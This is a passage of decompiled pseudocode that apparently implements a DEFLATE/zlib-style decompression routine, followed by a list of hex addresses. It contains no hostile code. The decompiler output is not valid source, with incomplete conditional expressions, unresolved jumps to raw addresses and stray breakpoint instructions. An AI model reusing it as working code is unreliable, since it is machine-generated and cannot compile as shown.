																		}
																		L98:
																		_t596 = ( *_t841 & 0x000000ff) << _t1043;
																		_t841 = _t841 + 1;
																		_t962 = _t962 | _t596;
																		 *(_t1058 - 0x18) = _t841;
																		_t1043 = _t1043 + 8;
																		 *(_t1058 - 4) = _t962;
																		__eflags = _t1043 - 8;
																		if(_t1043 < 8) {
																			continue;
																		} else {
																			L99:
																			_t936 =  *(_t1058 - 8);
																			goto L100;
																		}
																		goto L295;
																	}
																	L243:
																	 *_t1022 = 6;
																	goto L285;
																}
															}
															goto L295;
														}
														L103:
														_t596 =  *(_t1022 + 0x2922) & 0x000000ff;
														 *(_t1058 - 8) = ( *(_t1022 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1022 + 0x2920) & 0x000000ff;
														__eflags =  *(_t1058 - 8) - ((( *(_t1022 + 0x2923) & 0x000000ff) << 0x00000008 | _t596) ^ 0x0000ffff);
														if( *(_t1058 - 8) != ((( *(_t1022 + 0x2923) & 0x000000ff) << 0x00000008 | _t596) ^ 0x0000ffff)) {
															L265:
															 *(_t1058 - 0xc) = 0xffffffff;
															 *_t1022 = 0x27;
															goto L292;
														} else {
															L104:
															_t944 =  *(_t1058 - 8);
															while(1) {
																L105:
																__eflags = _t944;
																if(_t944 == 0) {
																	goto L85;
																}
																L106:
																__eflags = _t1043;
																if(_t1043 == 0) {
																	L113:
																	_t596 =  *(_t1058 - 0x10);
																	while(1) {
																		L114:
																		__eflags = _t944;
																		if(_t944 == 0) {
																			break;
																		}
																		L116:
																		_t1018 =  *((intOrPtr*)(_t1058 - 0x40));
																		__eflags = _t596 - _t1018;
																		if(_t596 < _t1018) {
																			L118:
																			_t596 =  *(_t1058 - 0x20);
																			__eflags = _t841 - _t596;
																			if(_t841 >= _t596) {
																				L247:
																				_t1022 =  *(_t1058 - 0x14);
																				 *_t1022 = 0x26;
																				goto L285;
																			} else {
																				L119:
																				_t962 = _t1018 -  *(_t1058 - 0x10);
																				_t1040 = _t596 - _t841;
																				__eflags = _t962 - _t1040;
																				_t814 =  <  ? _t962 : _t1040;
																				__eflags = ( <  ? _t962 : _t1040) - _t944;
																				if(( <  ? _t962 : _t1040) >= _t944) {
																					_t1022 = _t944;
																				} else {
																					__eflags = _t962 - _t1040;
																					_t1022 =  <  ? _t962 : _t1040;
																				}
																				L122:
																				L123:
																				memcpy();
																				_t841 = _t841 + _t1022;
																				_t596 =  *(_t1058 - 0x10) + _t1022;
																				_t1061 = _t1061 + 0xc;
																				 *(_t1058 - 0x18) = _t841;
																				_t944 =  *(_t1058 - 8) - _t1022;
																				 *(_t1058 - 0x10) = _t596;
																				 *(_t1058 - 8) = _t944;
																				continue;
																			}
																		} else {
																			L117:
																			_t1022 =  *(_t1058 - 0x14);
																			 *(_t1058 - 0xc) = 2;
																			 *_t1022 = 9;
																			goto L292;
																		}
																		goto L295;
																	}
																	L115:
																	goto 0x41f14b1;
																	asm("int3");
																	goto L85;
																} else {
																	L107:
																	__eflags = _t1043 - 8;
																	if(_t1043 >= 8) {
																		L110:
																		_t596 = _t962 & 0x000000ff;
																		_t962 = _t962 >> 8;
																		_t1043 = _t1043 - 8;
																		 *(_t1058 - 0x28) = _t596;
																		 *(_t1058 - 4) = _t962;
																		L111:
																		__eflags =  *(_t1058 - 0x10) -  *((intOrPtr*)(_t1058 - 0x40));
																		_t1022 =  *(_t1058 - 0x14);
																		if( *(_t1058 - 0x10) >=  *((intOrPtr*)(_t1058 - 0x40))) {
																			L246:
																			 *(_t1058 - 0xc) = 2;
																			 *_t1022 = 0x34;
																			goto L292;
																		} else {
																			L112:
																			 *(_t1058 - 0x10) =  *(_t1058 - 0x10) + 1;
																			 *( *(_t1058 - 0x10)) = _t596;
																			_t944 =  *(_t1058 - 8) - 1;
																			 *(_t1058 - 8) = _t944;
																			continue;
																		}
																	} else {
																		while(1) {
																			L108:
																			__eflags = _t841 -  *(_t1058 - 0x20);
																			if(_t841 >=  *(_t1058 - 0x20)) {
																				break;
																			}
																			L109:
																			_t596 = ( *_t841 & 0x000000ff) << _t1043;
																			_t841 = _t841 + 1;
																			_t962 = _t962 | _t596;
																			 *(_t1058 - 0x18) = _t841;
																			_t1043 = _t1043 + 8;
																			 *(_t1058 - 4) = _t962;
																			__eflags = _t1043 - 8;
																			if(_t1043 < 8) {
																				continue;
																			} else {
																				goto L110;
																			}
																			goto L295;
																		}
																		L245:
																		 *_t1022 = 0x33;
																		goto L285;
																	}
																}
																goto L295;
															}
															continue;
														}
													} else {
														while(1) {
															L91:
															__eflags = _t841 -  *(_t1058 - 0x20);
															if(_t841 >=  *(_t1058 - 0x20)) {
																break;
															}
															L92:
															_t820 = ( *_t841 & 0x000000ff) << _t1043;
															_t1043 = _t1043 + 8;
															_t991 = _t991 | _t820;
															_t841 = _t841 + 1;
															 *(_t1058 - 0x18) = _t841;
															_t596 = _t1043 & 0x00000007;
															 *(_t1058 - 4) = _t991;
															__eflags = _t1043 - _t596;
															if(_t1043 < _t596) {
																continue;
															} else {
																goto L93;
															}
															goto L295;
														}
														L242:
														 *_t1022 = 5;
														goto L285;
													}
												}
											} else {
												while(1) {
													L87:
													__eflags = _t841 -  *(_t1058 - 0x20);
													if(_t841 >=  *(_t1058 - 0x20)) {
														break;
													}
													L88:
													_t596 = ( *_t841 & 0x000000ff) << _t1043;
													_t841 = _t841 + 1;
													_t962 = _t962 | _t596;
													 *(_t1058 - 0x18) = _t841;
													_t1043 = _t1043 + 8;
													 *(_t1058 - 4) = _t962;
													__eflags = _t1043 - 3;
													if(_t1043 < 3) {
														continue;
													} else {
														goto L89;
													}
													goto L295;
												}
												L241:
												 *_t1022 = 3;
												goto L285;
											}
											goto L295;
										}
										L252:
										_t596 = _t1043 & 0x00000007;
										__eflags = _t1043 - _t596;
										if(_t1043 >= _t596) {
											L256:
											_t683 =  *(_t1058 - 0x3c);
											_t886 = _t1043 & 0x00000007;
											_t986 = _t962 >> _t886;
											_t1043 = _t1043 - _t886;
											 *(_t1058 - 4) = _t986;
											__eflags = _t841 - _t683;
											if(_t841 > _t683) {
												while(1) {
													L257:
													__eflags = _t1043 - 8;
													if(_t1043 < 8) {
														goto L259;
													}
													L258:
													_t841 = _t841 - 1;
													_t1043 = _t1043 - 8;
													__eflags = _t841 - _t683;
													if(_t841 > _t683) {
														continue;
													}
													goto L259;
												}
											}
											L259:
											L260:
											_t596 = _t1043;
											asm("bts edx, eax");
											__eflags = _t596 - 0x20;
											_t888 =  >=  ? _t986 : 0;
											_t987 = _t986 ^ _t888;
											__eflags = _t596 - 0x40;
											_t889 =  >=  ? _t987 : _t888;
											 *(_t1058 - 4) =  *(_t1058 - 4) & _t987 - 0x00000001;
											__eflags =  *(_t1058 + 0x18) & 0x00000001;
											if(( *(_t1058 + 0x18) & 0x00000001) == 0) {
												L290:
												_t684 = 0;
												__eflags = 0;
												 *_t1022 = 0x22;
												L291:
												 *(_t1058 - 0xc) = _t684;
												goto L292;
											} else {
												L261:
												_t890 = 0;
												while(1) {
													L277:
													 *(_t1058 - 8) = _t890;
													__eflags = _t890 - 4;
													if(_t890 >= 4) {
														goto L290;
													}
													L278:
													__eflags = _t1043;
													if(_t1043 != 0) {
														L281:
														_t989 =  *(_t1058 - 4);
														__eflags = _t1043 - 8;
														if(_t1043 >= 8) {
															L275:
															_t685 = _t989 & 0x000000ff;
															_t1043 = _t1043 - 8;
															__eflags = _t1043;
															 *(_t1058 - 4) = _t989 >> 8;
															goto L276;
														} else {
															L282:
															while(1) {
																L272:
																__eflags = _t841 -  *(_t1058 - 0x20);
																if(_t841 >=  *(_t1058 - 0x20)) {
																	break;
																}
																L273:
																_t596 = ( *_t841 & 0x000000ff) << _t1043;
																_t1043 = _t1043 + 8;
																_t989 = _t989 | _t596;
																_t841 = _t841 + 1;
																 *(_t1058 - 4) = _t989;
																__eflags = _t1043 - 8;
																if(_t1043 < 8) {
																	continue;
																} else {
																	L274:
																	_t890 =  *(_t1058 - 8);
																	goto L275;
																}
																goto L295;
															}
															L284:
															 *_t1022 = 0x29;
															goto L285;
														}
													} else {
														L279:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															L283:
															 *_t1022 = 0x2a;
															goto L285;
														} else {
															L280:
															_t685 =  *_t841 & 0x000000ff;
															_t841 = _t841 + 1;
															L276:
															 *(_t1058 - 0x24) = _t685;
															_t596 =  *(_t1022 + 0x10) << 0x00000008 |  *(_t1058 - 0x24);
															_t890 = _t890 + 1;
															__eflags = _t890;
															 *(_t1022 + 0x10) = _t596;
															continue;
														}
													}
													goto L295;
												}
												goto L290;
											}
										} else {
											L253:
											while(1) {
												L254:
												__eflags = _t841 -  *(_t1058 - 0x20);
												if(_t841 >=  *(_t1058 - 0x20)) {
													break;
												}
												L255:
												_t690 = ( *_t841 & 0x000000ff) << _t1043;
												_t1043 = _t1043 + 8;
												_t962 = _t962 | _t690;
												_t841 = _t841 + 1;
												 *(_t1058 - 4) = _t962;
												_t596 = _t1043 & 0x00000007;
												__eflags = _t1043 - _t596;
												if(_t1043 < _t596) {
													continue;
												} else {
													goto L256;
												}
												goto L295;
											}
											L271:
											 *_t1022 = 0x20;
											goto L285;
										}
									}
								} else {
									L49:
									__eflags = _t1043 - 0xf;
									if(_t1043 < 0xf) {
										_t999 =  *(_t841 + 1) & 0x000000ff;
										_t880 = _t1043;
										_t721 =  *_t841 & 0x000000ff;
										_t841 = _t841 + 2;
										_t1022 =  *(_t1058 - 0x14);
										 *(_t1058 - 0x18) = _t841;
										 *(_t1058 - 4) =  *(_t1058 - 4) | (_t999 << 0x00000008 | _t721) << _t880;
										_t1043 = _t1043 + 0x10;
										__eflags = _t1043;
										_t962 =  *(_t1058 - 4);
									}
									_t714 =  *((short*)(_t1022 + 0x160 + (_t962 & 0x000003ff) * 2));
									 *(_t1058 - 0x1c) = _t714;
									__eflags = _t714;
									if(_t714 < 0) {
										L53:
										goto 0x41f1472;
										asm("int3");
										asm("int3");
										asm("int3");
										do {
											L54:
											_t716 = _t962 >> _t880;
											_t880 = _t880 + 1;
											_t841 =  *((short*)(_t1022 + 0x960 + ((_t716 & 0x00000001) +  !_t841) * 2));
											__eflags = _t841;
										} while (_t841 < 0);
										 *(_t1058 - 0x1c) = _t841;
										_t841 =  *(_t1058 - 0x18);
									} else {
										L52:
										_t880 = _t714 >> 9;
									}
									L56:
									_t596 =  *(_t1058 - 8);
									_t1043 = _t1043 - _t880;
									_t962 = _t962 >> _t880;
									 *(_t1058 - 4) = _t962;
									 *( *(_t1058 - 0x10)) = _t596;
									_t880 =  *(_t1058 - 0x1c);
									__eflags = _t880 & 0x00000100;
									if((_t880 & 0x00000100) != 0) {
										L83:
										_t170 = _t1058 - 0x10;
										 *_t170 =  *(_t1058 - 0x10) + 1;
										__eflags =  *_t170;
										goto L84;
									} else {
										L57:
										_t719 =  *(_t1058 - 0x10);
										 *(_t719 + 1) = _t880;
										 *(_t1058 - 0x10) = _t719 + 2;
										continue;
										do {
											do {
												while(1) {
													L39:
													_t879 =  *(_t1058 - 0x20) - _t841;
													__eflags = _t879 - 4;
													if(_t879 < 4) {
														goto L58;
													}
													goto L40;
												}
												L26:
												__eflags = _t877;
											} while (_t877 == 0);
											goto 0x41f140c;
											asm("int3");
											_t824 =  *_t830;
											 *_t1022 = _t824;
											_t1022 =  *(_t1058 - 0x14);
											__eflags = _t877 - 1;
											if(_t877 > 1) {
												L29:
												L36:
												goto 0x41f1448;
												asm("int3");
												 *(_t982 + 1) =  *((intOrPtr*)(_t824 + 1));
												_t982 =  *(_t1058 - 4);
											}
											L38:
											_t85 = _t1058 - 0x10;
											 *_t85 = _t877 +  *(_t1058 - 0x10);
											__eflags =  *_t85;
											while(1) {
												L39:
												_t879 =  *(_t1058 - 0x20) - _t841;
												__eflags = _t879 - 4;
												if(_t879 < 4) {
													goto L58;
												}
												goto L40;
											}
											L33:
											 *(_t1058 - 0x10) = _t1022;
											_t1022 =  *(_t1058 - 0x14);
											 *(_t1058 - 0xc) = _t982;
											_t982 =  *(_t1058 - 4);
											 *(_t1058 - 8) = _t877;
											__eflags = _t877;
										} while (_t877 <= 0);
										goto 0x41f1434;
										asm("int3");
										_t824 =  *_t666;
										 *_t1022 = _t824;
										_t1022 =  *(_t1058 - 0x14);
										__eflags = _t877 - 1;
										if(_t877 > 1) {
											goto L36;
										}
										goto L38;
									}
								}
							}
							goto L295;
							L58:
							__eflags = _t1043 - 0xf;
							if(_t1043 >= 0xf) {
								L75:
								_t669 =  *((short*)(_t1022 + 0x160 + (_t982 & 0x000003ff) * 2));
								 *(_t1058 - 8) = _t669;
								__eflags = _t669;
								if(_t669 < 0) {
									L77:
									goto 0x41f149b;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L78:
										_t671 = _t982 >> _t879;
										_t879 = _t879 + 1;
										_t596 = (_t671 & 0x00000001) +  !_t841;
										_t841 =  *((short*)(_t1022 + 0x960 + _t596 * 2));
										__eflags = _t841;
									} while (_t841 < 0);
									 *(_t1058 - 8) = _t841;
									_t841 =  *(_t1058 - 0x18);
								} else {
									L76:
									_t879 = _t669 >> 9;
									_t596 = _t669 & 0x000001ff;
									 *(_t1058 - 8) = _t596;
								}
								L80:
								_t962 = _t982 >> _t879;
								_t1043 = _t1043 - _t879;
								_t880 =  *(_t1058 - 8);
								 *(_t1058 - 4) = _t962;
								__eflags = _t880 - 0x100;
								if(_t880 >= 0x100) {
									goto L84;
								} else {
									L81:
									_t822 =  *(_t1058 - 0x10);
									__eflags = _t822 -  *((intOrPtr*)(_t1058 - 0x40));
									if(_t822 >=  *((intOrPtr*)(_t1058 - 0x40))) {
										L240:
										 *(_t1058 - 0xc) = 2;
										 *_t1022 = 0x18;
										goto L292;
									} else {
										L82:
										 *_t822 = _t880;
										 *(_t1058 - 0x10) = _t822 + 1;
										continue;
									}
								}
							} else {
								L59:
								__eflags = _t879 - 2;
								if(_t879 >= 2) {
									L73:
									_t992 =  *(_t841 + 1) & 0x000000ff;
									_t695 =  *_t841 & 0x000000ff;
									_t841 = _t841 + 2;
									_t879 = _t1043;
									 *(_t1058 - 0x18) = _t841;
									 *(_t1058 - 4) =  *(_t1058 - 4) | _t992 << _t1043 + 0x00000008 | _t695 << _t879;
									_t1043 = _t1043 + 0x10;
									__eflags = _t1043;
									_t982 =  *(_t1058 - 4);
									goto L74;
								} else {
									do {
										L60:
										_t596 = _t982 & 0x000003ff;
										_t1025 =  *((short*)(_t1022 + 0x160 + _t596 * 2));
										__eflags = _t1025;
										if(_t1025 < 0) {
											L64:
											__eflags = _t1043 - 0xa;
											if(_t1043 <= 0xa) {
												goto L69;
											} else {
												L65:
												 *(_t1058 - 0x1c) = _t879;
												while(1) {
													L67:
													_t1025 =  *((short*)( *(_t1058 - 0x14) + 0x960 + ((_t982 >> _t879 & 0x00000001) +  !_t1025) * 2));
													_t879 =  *(_t1058 - 0x1c) + 1;
													 *(_t1058 - 0x1c) = _t879;
													__eflags = _t1025;
													if(_t1025 >= 0) {
														goto L74;
													}
													L68:
													_t596 = _t879 + 1;
													__eflags = _t1043 - _t596;
													if(_t1043 >= _t596) {
														continue;
													} else {
														goto L69;
													}
													goto L295;
												}
												goto L74;
											}
										} else {
											L61:
											_t1027 = _t1025 >> 9;
											__eflags = _t1027;
											if(_t1027 == 0) {
												L69:
												_t1022 =  *(_t1058 - 0x14);
												L70:
												__eflags = _t841 -  *(_t1058 - 0x20);
												if(_t841 >=  *(_t1058 - 0x20)) {
													L239:
													 *_t1022 = 0x17;
													goto L285;
												} else {
													goto L71;
												}
											} else {
												L62:
												__eflags = _t1043 - _t1027;
												if(_t1043 >= _t1027) {
													L74:
													_t1022 =  *(_t1058 - 0x14);
													goto L75;
												} else {
													L63:
													goto L69;
												}
											}
										}
										goto L295;
										L71:
										_t879 = _t1043;
										_t699 = ( *_t841 & 0x000000ff) << _t879;
										_t841 = _t841 + 1;
										_t982 = _t982 | _t699;
										 *(_t1058 - 0x18) = _t841;
										_t1043 = _t1043 + 8;
										 *(_t1058 - 4) = _t982;
										__eflags = _t1043 - 0xf;
									} while (_t1043 < 0xf);
									goto L75;
								}
							}
							goto L295;
						}
					}
					L142:
					 *(_t1058 - 0xc) = 0x40 + _t694 * 0xda0 + _t1022;
					memset(_t1058 - 0xd0, 0, 0x40);
					memset( *(_t1058 - 0xc) + 0x120, 0, 0x800);
					memset( *(_t1058 - 0xc) + 0x920, 0, 0x480);
					_t894 = 0;
					_t1061 = _t1061 + 0x24;
					_t1005 = _t1022 + ( *(_t1022 + 0x18) + 0xb) * 4;
					 *(_t1058 - 0x44) = _t1005;
					__eflags =  *_t1005;
					if( *_t1005 > 0) {
						L143:
						_t1022 =  *(_t1058 - 0xc);
						do {
							L144:
							_t797 =  *(_t894 + _t1022) & 0x000000ff;
							_t894 = _t894 + 1;
							 *((intOrPtr*)(_t1058 + _t797 * 4 - 0xd0)) =  *((intOrPtr*)(_t1058 + _t797 * 4 - 0xd0)) + 1;
							__eflags = _t894 -  *_t1005;
						} while (_t894 <  *_t1005);
					}
					L145:
					goto 0x41f1500;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					L146:
					 *(_t1058 - 0x8c) = _t894;
					 *(_t1058 - 0x90) = _t894;
					 *(_t1058 - 0x2c) = _t894;
					 *(_t1058 - 0x30) = _t894;
					do {
						L147:
						_t734 =  *((intOrPtr*)(_t1058 + _t1005 - 0xd4));
						_t896 = _t894 + _t734 + _t894 + _t734;
						_t1022 = _t1022 + _t734;
						_t735 =  *((intOrPtr*)(_t1058 + _t1005 - 0xd0));
						 *(_t1058 - 0x30) =  *(_t1058 - 0x30) + _t735;
						 *((intOrPtr*)(_t1058 + _t1005 - 0x90)) = _t896;
						_t736 =  *((intOrPtr*)(_t1058 + _t1005 - 0xcc));
						_t898 = _t896 + _t735 + _t896 + _t735;
						 *(_t1058 - 0x2c) =  *(_t1058 - 0x2c) + _t736;
						 *((intOrPtr*)(_t1058 + _t1005 - 0x8c)) = _t898;
						_t894 = _t898 + _t736 + _t898 + _t736;
						 *(_t1058 + _t1005 - 0x88) = _t894;
						_t1005 = _t1005 + 0xc;
						__eflags = _t1005 - 0x40;
					} while (_t1005 <= 0x40);
					 *(_t1058 - 0x4c) = _t894;
					 *(_t1058 - 0x24) = _t1022;
					_t1022 =  *(_t1058 - 0x14);
					_t901 =  *(_t1058 - 0x24) +  *(_t1058 - 0x2c) +  *(_t1058 - 0x30);
					__eflags =  *(_t1058 - 0x4c) - 0x10000;
					if( *(_t1058 - 0x4c) == 0x10000) {
						L150:
						_t739 =  *(_t1058 - 0x44);
						 *(_t1058 - 0x30) = 0xffffffff;
						 *(_t1058 - 0x4c) = 0;
						__eflags =  *_t739;
						if( *_t739 > 0) {
							L151:
							_t1057 =  *(_t1058 - 0x4c);
							do {
								L152:
								L153:
								_t913 =  *(_t1057 + _t739) & 0x000000ff;
								 *(_t1058 - 0x44) = _t913;
								__eflags = _t913;
								if(_t913 != 0) {
									L154:
									_t776 =  *(_t1058 + _t913 * 4 - 0x90);
									 *(_t1058 - 0x2c) = _t776;
									 *(_t1058 + _t913 * 4 - 0x90) = _t776 + 1;
									 *(_t1058 - 0x24) = _t913;
									__eflags = _t913;
									if(_t913 != 0) {
										L155:
										do {
											L156:
											 *(_t1058 - 0x2c) =  *(_t1058 - 0x2c) >> 1;
											_t796 =  *(_t1058 - 0x24) - 1;
											_t1005 = _t1005 + _t1005 |  *(_t1058 - 0x2c) & 0x00000001;
											 *(_t1058 - 0x24) = _t796;
											__eflags = _t796;
										} while (_t796 != 0);
										_t913 =  *(_t1058 - 0x44);
									}
									L158:
									__eflags = _t913 - 0xa;
									if(_t913 > 0xa) {
										L164:
										_t780 =  *(_t1058 - 0xc) + 0x120 + (_t1005 & 0x000003ff) * 2;
										_t841 =  *(_t1058 - 0x30);
										 *(_t1058 - 0x44) = _t780;
										_t781 =  *_t780;
										 *(_t1058 - 0x2c) = _t781;
										__eflags = _t781;
										if(_t781 == 0) {
											 *( *(_t1058 - 0x44)) = _t841;
											_t781 = _t841;
											_t841 = _t841 - 2;
											__eflags = _t841;
											 *(_t1058 - 0x2c) = _t781;
											 *(_t1058 - 0x30) = _t841;
										}
										L166:
										_t1013 = _t1005 >> 9;
										__eflags = _t913 - 0xb;
										if(_t913 > 0xb) {
											L167:
											_t914 = _t913 + 0xfffffff5;
											__eflags = _t914;
											 *(_t1058 - 0x24) = _t914;
											_t915 =  *(_t1058 - 0x2c);
											do {
												L168:
												_t1013 = _t1013 >> 1;
												_t786 = 0x48f - _t915 - (_t1013 & 0x00000001);
												_t918 =  *( *(_t1058 - 0xc) + 0x91e) & 0x0000ffff;
												__eflags = _t918;
												if(_t918 != 0) {
													_t915 = _t918;
												} else {
													 *( *(_t1058 - 0xc) + _t786 * 2) = _t841;
													_t787 =  *(_t1058 - 0x30);
													_t915 = _t787;
													_t788 = _t787 - 2;
													 *(_t1058 - 0x30) = _t788;
													_t841 = _t788;
												}
												L171:
												_t361 = _t1058 - 0x24;
												 *_t361 =  *(_t1058 - 0x24) - 1;
												__eflags =  *_t361;
											} while ( *_t361 != 0);
											 *(_t1058 - 0x2c) = _t915;
											_t781 = _t915;
										}
										L173:
										_t1005 = (_t1013 >> 0x00000001 & 0x00000001) - _t781;
										__eflags = _t1005;
										 *( *(_t1058 - 0xc) + 0x91e + _t1005 * 2) = _t1057;
									} else {
										L159:
										_t793 = (_t913 << 0x00000009 | _t1057) & 0x0000ffff;
										 *(_t1058 - 0x44) = _t793;
										__eflags = _t1005 - 0x400;
										if(_t1005 < 0x400) {
											L160:
											goto 0x41f152a;
											asm("int3");
											asm("int3");
											asm("int3");
											L161:
											_t794 = _t793 << _t913;
											 *(_t1058 - 0x4c) = _t794 + _t794;
											_t923 =  *(_t1058 - 0xc) + _t1005 * 2 + 0x120;
											__eflags = _t923;
											do {
												L162:
												 *_t923 = _t1022;
												_t1005 = _t1005 + _t794;
												_t923 = _t923 +  *(_t1058 - 0x4c);
												__eflags = _t1005 - 0x400;
											} while (_t1005 < 0x400);
											_t1022 =  *(_t1058 - 0x14);
										}
									}
								}
								L174:
								_t739 =  *(_t1022 + 0x18);
								_t1057 = _t1057 + 1;
								__eflags = _t1057 -  *((intOrPtr*)(_t1022 + 0x2c + _t739 * 4));
							} while (_t1057 <  *((intOrPtr*)(_t1022 + 0x2c + _t739 * 4)));
							goto 0x41f1540;
							asm("int3");
						}
						L176:
						__eflags =  *(_t1022 + 0x18) - 2;
						if( *(_t1022 + 0x18) != 2) {
							L217:
							 *(_t1022 + 0x18) =  *(_t1022 + 0x18) - 1;
							goto L141;
						} else {
							L177:
							_t902 = 0;
							__eflags = 0;
							while(1) {
								L178:
								_t1006 =  *(_t1058 - 4);
								while(1) {
									L179:
									 *(_t1058 - 8) = _t902;
									__eflags = _t902 -  *(_t1022 + 0x30) +  *(_t1022 + 0x2c);
									if(_t902 >=  *(_t1022 + 0x30) +  *(_t1022 + 0x2c)) {
										break;
									}
									L180:
									__eflags = _t1057 - 0xf;
									if(_t1057 >= 0xf) {
										L197:
										_t754 =  *((short*)(_t1022 + 0x1ca0 + (_t1006 & 0x000003ff) * 2));
										 *(_t1058 - 0x28) = _t754;
										__eflags = _t754;
										if(_t754 < 0) {
											L199:
											L200:
											do {
												L201:
												 *(_t1058 - 0x28) =  !( *(_t1058 - 0x28));
												_t756 = _t1006 >> _t902;
												_t902 = _t902 + 1;
												_t596 =  *((short*)(_t1022 + 0x24a0 + ((_t756 & 0x00000001) +  *(_t1058 - 0x28)) * 2));
												 *(_t1058 - 0x28) = _t596;
												__eflags = _t596;
											} while (_t596 < 0);
										} else {
											L198:
											_t902 = _t754 >> 9;
											_t596 = _t754 & 0x000001ff;
											 *(_t1058 - 0x28) = _t596;
										}
										L202:
										_t1006 = _t1006 >> _t902;
										_t1043 = _t1057 - _t902;
										 *(_t1058 - 4) = _t1006;
										 *(_t1058 - 0x1c) = _t1043;
										__eflags = _t596 - 0x10;
										if(__eflags >= 0) {
											L204:
											if(__eflags != 0) {
												L207:
												_t903 =  *((char*)(_t596 + 0x41e0ff0));
												 *(_t1058 - 0x38) = _t903;
												__eflags = _t1043 - _t903;
												if(_t1043 >= _t903) {
													L211:
													_t1043 = _t1043 - _t903;
													 *(_t1058 - 0x1c) = _t1043;
													_t904 =  *(_t1058 - 0x14);
													_t1032 = ((0x00000001 << _t903) - 0x00000001 & _t1006) +  *((char*)(_t596 + 0x41e0ff8));
													__eflags =  *(_t1058 - 0x28) - 0x10;
													_t760 =  *(_t1058 - 8);
													 *(_t1058 - 4) = _t1006 >> _t903;
													if( *(_t1058 - 0x28) != 0x10) {
														_t1009 = 0;
														__eflags = 0;
													} else {
														_t1009 =  *(_t760 + _t904 + 0x2923) & 0x000000ff;
													}
													L214:
													memset(_t760 + _t904 + 0x2924, _t1009, _t1032);
													_t1061 = _t1061 + 0xc;
													_t902 =  *(_t1058 - 8) + _t1032;
													_t1022 =  *(_t1058 - 0x14);
													L178:
													_t1006 =  *(_t1058 - 4);
													continue;
												} else {
													while(1) {
														L208:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															break;
														}
														L209:
														_t596 = ( *_t841 & 0x000000ff) << _t1043;
														_t841 = _t841 + 1;
														_t903 =  *(_t1058 - 0x38);
														_t1006 = _t1006 | _t596;
														_t1043 = _t1043 + 8;
														 *(_t1058 - 0x18) = _t841;
														 *(_t1058 - 4) = _t1006;
														__eflags = _t1043 - _t903;
														if(_t1043 < _t903) {
															continue;
														} else {
															L210:
															_t596 =  *(_t1058 - 0x28);
															goto L211;
														}
														goto L295;
													}
													L251:
													 *_t1022 = 0x12;
													goto L285;
												}
											} else {
												L205:
												_t764 =  *(_t1058 - 8);
												__eflags = _t764;
												if(_t764 == 0) {
													L268:
													_t684 = _t764 | 0xffffffff;
													 *_t1022 = 0x11;
													goto L291;
												} else {
													L206:
													_t596 =  *(_t1058 - 0x28);
													goto L207;
												}
											}
										} else {
											L203:
											_t908 =  *(_t1058 - 8);
											 *(_t1022 + 0x2924 + _t908) = _t596;
											_t902 = _t908 + 1;
											continue;
										}
									} else {
										L181:
										__eflags =  *(_t1058 - 0x20) - _t841 - 2;
										if( *(_t1058 - 0x20) - _t841 >= 2) {
											L195:
											_t1010 =  *(_t841 + 1) & 0x000000ff;
											_t767 =  *_t841 & 0x000000ff;
											_t841 = _t841 + 2;
											_t902 = _t1057;
											 *(_t1058 - 0x18) = _t841;
											 *(_t1058 - 4) =  *(_t1058 - 4) | _t1010 << _t1057 + 0x00000008 | _t767 << _t902;
											_t1057 = _t1057 + 0x10;
											__eflags = _t1057;
											_t1006 =  *(_t1058 - 4);
											goto L196;
										} else {
											do {
												L182:
												_t596 = _t1006 & 0x000003ff;
												_t1033 =  *((short*)(_t1022 + 0x1ca0 + _t596 * 2));
												__eflags = _t1033;
												if(_t1033 < 0) {
													L186:
													__eflags = _t1057 - 0xa;
													if(_t1057 <= 0xa) {
														goto L191;
													} else {
														L187:
														L188:
														 *(_t1058 - 0x24) = _t902;
														while(1) {
															L189:
															_t1033 =  *((short*)( *(_t1058 - 0x14) + 0x24a0 + ((_t1006 >> _t902 & 0x00000001) +  !_t1033) * 2));
															_t902 =  *(_t1058 - 0x24) + 1;
															 *(_t1058 - 0x24) = _t902;
															__eflags = _t1033;
															if(_t1033 >= 0) {
																goto L196;
															}
															L190:
															_t596 = _t902 + 1;
															__eflags = _t1057 - _t596;
															if(_t1057 >= _t596) {
																continue;
															} else {
																goto L191;
															}
															goto L295;
														}
														goto L196;
													}
												} else {
													L183:
													_t1035 = _t1033 >> 9;
													__eflags = _t1035;
													if(_t1035 == 0) {
														L191:
														_t1022 =  *(_t1058 - 0x14);
														L192:
														__eflags = _t841 -  *(_t1058 - 0x20);
														if(_t841 >=  *(_t1058 - 0x20)) {
															L250:
															 *_t1022 = 0x10;
															goto L285;
														} else {
															goto L193;
														}
													} else {
														L184:
														__eflags = _t1057 - _t1035;
														if(_t1057 >= _t1035) {
															L196:
															_t1022 =  *(_t1058 - 0x14);
															goto L197;
														} else {
															L185:
															goto L191;
														}
													}
												}
												goto L295;
												L193:
												_t902 = _t1057;
												_t771 = ( *_t841 & 0x000000ff) << _t902;
												_t841 = _t841 + 1;
												_t1006 = _t1006 | _t771;
												 *(_t1058 - 0x18) = _t841;
												_t1057 = _t1057 + 8;
												 *(_t1058 - 4) = _t1006;
												__eflags = _t1057 - 0xf;
											} while (_t1057 < 0xf);
											goto L197;
										}
									}
									goto L295;
								}
								L215:
								_t1007 =  *(_t1022 + 0x2c);
								_t743 =  *(_t1022 + 0x30) + _t1007;
								__eflags = _t743 - _t902;
								if(_t743 != _t902) {
									L269:
									_t684 = _t743 | 0xffffffff;
									 *_t1022 = 0x15;
									goto L291;
								} else {
									L216:
									memcpy(_t1022 + 0x40, _t1022 + 0x2924, _t1007);
									_t749 =  *(_t1022 + 0x2c) + 0x2924 + _t1022;
									__eflags = _t749;
									memcpy(_t1022 + 0xde0, _t749,  *(_t1022 + 0x30));
									_t1061 = _t1061 + 0x18;
									goto L217;
								}
								goto L295;
							}
						}
					} else {
						L149:
						__eflags = _t901 - 1;
						if(_t901 > 1) {
							L267:
							 *(_t1058 - 0xc) = 0xffffffff;
							 *_t1022 = 0x23;
							goto L292;
						} else {
							goto L150;
						}
					}
					goto L295;
				}
			}

0x041d5ee5
0x041d5ee5
0x041d5ee5
0x041d5ee5
0x041d5ee5
0x041d5ee5
0x041d5eee
0x041d5ef4
0x041d5ef7
0x041d5efc
0x041d5efc
0x041d5efc
0x041d5eff
0x041d5f02
0x00000000
0x00000000
0x041d5f04
0x041d5f04
